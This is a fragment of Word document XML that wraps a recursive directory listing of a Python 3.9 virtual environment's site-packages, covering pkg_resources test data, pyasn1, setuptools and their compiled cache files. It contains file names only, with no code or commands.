    <w:p w14:paraId="50FF8D1F" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D5C25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./venv/lib/python3.9/site-packages/pkg_resources/tests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018E5D6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data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA1F662" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5975EFC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./venv/lib/python3.9/site-packages/pkg_resources/tests/data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7BC8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my-test-package-source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D467AC" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169A189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./venv/lib/python3.9/site-packages/pkg_resources/tests/data/my-test-package-source:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE09E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setup.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBFEEB1" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2134C01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./venv/lib/python3.9/site-packages/pkg_resources/tests/data/my-test-package-source/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBADAC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setup.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E67A749" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29896EC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./venv/lib/python3.9/site-packages/pyasn1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B277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codec  compat  debug.py  error.py  type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D637BA" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7224D4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./venv/lib/python3.9/site-packages/pyasn1/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB1A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debug.cpython-39.pyc  error.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E2B7D" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6347108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./venv/lib/python3.9/site-packages/pyasn1/codec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38512A9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ber  cer  der  native  streaming.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDC90BE" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A99C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./venv/lib/python3.9/site-packages/pyasn1/codec/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DFB5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streaming.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663798E7" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF1D0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./venv/lib/python3.9/site-packages/pyasn1/codec/ber:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CFFF0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decoder.py  encoder.py  eoo.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06774ABF" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297B326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./venv/lib/python3.9/site-packages/pyasn1/codec/ber/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7648F83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decoder.cpython-39.pyc  encoder.cpython-39.pyc  eoo.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68679100" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6832953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./venv/lib/python3.9/site-packages/pyasn1/codec/cer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77939EF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decoder.py  encoder.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754591B0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F2FCC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./venv/lib/python3.9/site-packages/pyasn1/codec/cer/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD94C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decoder.cpython-39.pyc  encoder.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674625D8" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0926BAF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./venv/lib/python3.9/site-packages/pyasn1/codec/der:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE06ED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decoder.py  encoder.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16096D1A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02AB320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./venv/lib/python3.9/site-packages/pyasn1/codec/der/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA9DC4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decoder.cpython-39.pyc  encoder.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B746511" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B55FC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./venv/lib/python3.9/site-packages/pyasn1/codec/native:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC433E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decoder.py  encoder.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0825B8" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799BE6E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./venv/lib/python3.9/site-packages/pyasn1/codec/native/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5E45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decoder.cpython-39.pyc  encoder.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3045AEE7" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C53B0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./venv/lib/python3.9/site-packages/pyasn1/compat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B677B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integer.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401B939A" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFA58E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./venv/lib/python3.9/site-packages/pyasn1/compat/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B318D9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integer.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271143C1" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6106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./venv/lib/python3.9/site-packages/pyasn1/type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114514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base.py  constraint.py  namedtype.py  opentype.py  tagmap.py  useful.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2242BF2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char.py  error.py       namedval.py   tag.py       univ.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ABBFBC" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E792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./venv/lib/python3.9/site-packages/pyasn1/type/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EECD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constraint.cpython-39.pyc  namedval.cpython-39.pyc  tagmap.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525CAD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base.cpython-39.pyc      error.cpython-39.pyc       opentype.cpython-39.pyc  univ.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887E16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char.cpython-39.pyc      namedtype.cpython-39.pyc   tag.cpython-39.pyc       useful.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF7454" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7E85A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./venv/lib/python3.9/site-packages/pyasn1-0.6.1.dist-info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DAD21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INSTALLER  LICENSE.rst  METADATA  RECORD  WHEEL  top_level.txt  zip-safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA24C0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0320D1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./venv/lib/python3.9/site-packages/setuptools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1725A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__init__.py               archive_util.py   dist.py        launch.py          sandbox.py           windows_support.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0CE7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__pycache__               build_meta.py     errors.py      monkey.py         'script (dev).tmpl'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D6DD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_deprecation_warning.py   command           extension.py   msvc.py            script.tmpl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220C813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_distutils                config.py         extern         namespaces.py      unicode_utils.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C6E5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_imp.py                   dep_util.py       glob.py        package_index.py   version.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D676E2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_vendor                   depends.py        installer.py   py34compat.py      wheel.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FAA63D" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C84F9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./venv/lib/python3.9/site-packages/setuptools/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA2677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dep_util.cpython-39.pyc   installer.cpython-39.pyc      py34compat.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6813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_deprecation_warning.cpython-39.pyc  depends.cpython-39.pyc    launch.cpython-39.pyc         sandbox.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5C16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_imp.cpython-39.pyc                  dist.cpython-39.pyc       monkey.cpython-39.pyc         unicode_utils.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19999C4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archive_util.cpython-39.pyc          errors.cpython-39.pyc     msvc.cpython-39.pyc           version.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350D466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build_meta.cpython-39.pyc            extension.cpython-39.pyc  namespaces.cpython-39.pyc     wheel.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5952CBD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config.cpython-39.pyc                glob.cpython-39.pyc       package_index.cpython-39.pyc  windows_support.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863AD15" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F3E9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./venv/lib/python3.9/site-packages/setuptools/_distutils:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625687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ccompiler.py  cygwinccompiler.py  errors.py        log.py            spawn.py          version.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9ED40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cmd.py        debug.py            extension.py     msvc9compiler.py  sysconfig.py      versionpredicate.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A0B6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_msvccompiler.py  command       dep_util.py         fancy_getopt.py  msvccompiler.py   text_file.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D370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archive_util.py   config.py     dir_util.py         file_util.py     py35compat.py     unixccompiler.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E521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bcppcompiler.py   core.py       dist.py             filelist.py      py38compat.py     util.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F0BD96" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A5ECE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./venv/lib/python3.9/site-packages/setuptools/_distutils/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7EF3D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__init__.cpython-39.pyc       cygwinccompiler.cpython-39.pyc  file_util.cpython-39.pyc      sysconfig.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E9F8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_msvccompiler.cpython-39.pyc  debug.cpython-39.pyc            filelist.cpython-39.pyc       text_file.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1BFA0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archive_util.cpython-39.pyc   dep_util.cpython-39.pyc         log.cpython-39.pyc            unixccompiler.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552D61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bcppcompiler.cpython-39.pyc   dir_util.cpython-39.pyc         msvc9compiler.cpython-39.pyc  util.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EC5FE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ccompiler.cpython-39.pyc      dist.cpython-39.pyc             msvccompiler.cpython-39.pyc   version.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48285DE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cmd.cpython-39.pyc            errors.cpython-39.pyc           py35compat.cpython-39.pyc     versionpredicate.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6AB0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config.cpython-39.pyc         extension.cpython-39.pyc        py38compat.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FCE68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core.cpython-39.pyc           fancy_getopt.cpython-39.pyc     spawn.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C252DA6" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49551A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./venv/lib/python3.9/site-packages/setuptools/_distutils/command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD57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bdist_msi.py      build_clib.py     check.py    install_data.py      install_scripts.py  upload.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267F31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__pycache__    bdist_rpm.py      build_ext.py      clean.py    install_egg_info.py  py37compat.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789C469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bdist.py       bdist_wininst.py  build_py.py       config.py   install_headers.py   register.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4CBE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bdist_dumb.py  build.py          build_scripts.py  install.py  install_lib.py       sdist.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0146AE86" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA205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./venv/lib/python3.9/site-packages/setuptools/_distutils/command/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B129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build.cpython-39.pyc          clean.cpython-39.pyc             install_lib.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A1F9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bdist.cpython-39.pyc          build_clib.cpython-39.pyc     config.cpython-39.pyc            install_scripts.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E971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bdist_dumb.cpython-39.pyc     build_ext.cpython-39.pyc      install.cpython-39.pyc           py37compat.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBDDF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bdist_msi.cpython-39.pyc      build_py.cpython-39.pyc       install_data.cpython-39.pyc      register.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153B56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bdist_rpm.cpython-39.pyc      build_scripts.cpython-39.pyc  install_egg_info.cpython-39.pyc  sdist.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206BA3D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bdist_wininst.cpython-39.pyc  check.cpython-39.pyc          install_headers.cpython-39.pyc   upload.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7A3CD6" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587CB8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./venv/lib/python3.9/site-packages/setuptools/_vendor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C3DEF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more_itertools  ordered_set.py  packaging  pyparsing.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4E7C55" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A049C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./venv/lib/python3.9/site-packages/setuptools/_vendor/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEEE9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ordered_set.cpython-39.pyc  pyparsing.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7180FEB5" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB867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./venv/lib/python3.9/site-packages/setuptools/_vendor/more_itertools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4974167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  more.py  recipes.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058DD295" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD4565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./venv/lib/python3.9/site-packages/setuptools/_vendor/more_itertools/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690090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more.cpython-39.pyc  recipes.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C11DAF" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9CA86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./venv/lib/python3.9/site-packages/setuptools/_vendor/packaging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F54B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__about__.py  __pycache__    _musllinux.py   markers.py       specifiers.py  utils.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5DCC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_manylinux.py  _structures.py  requirements.py  tags.py        version.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284F9DB" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027216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./venv/lib/python3.9/site-packages/setuptools/_vendor/packaging/__pycache__:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCACC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__about__.cpython-39.pyc   _musllinux.cpython-39.pyc   requirements.cpython-39.pyc  utils.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D09D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_structures.cpython-39.pyc  specifiers.cpython-39.pyc    version.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473F090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_manylinux.cpython-39.pyc  markers.cpython-39.pyc      tags.cpython-39.pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5849DA15" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24404C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./venv/lib/python3.9/site-packages/setuptools/command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C72B7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__init__.py    bdist_rpm.py    develop.py        install.py           'launcher manifest.xml'   saveopts.py   upload.py</w:t>
      </w:r>
    </w:p>
